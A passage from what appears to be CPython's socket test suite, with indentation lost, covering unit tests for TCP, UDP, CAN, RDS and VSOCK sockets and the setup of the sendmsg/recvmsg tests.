with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(os.path.join(tmpdir, 'socket'))
self._test_socket_fileno(s, socket.AF_UNIX, socket.SOCK_STREAM)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
self.assertEqual(cm.exception.errno, errno.ENOBUFS)
# and we should have received a congestion notification through poll
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
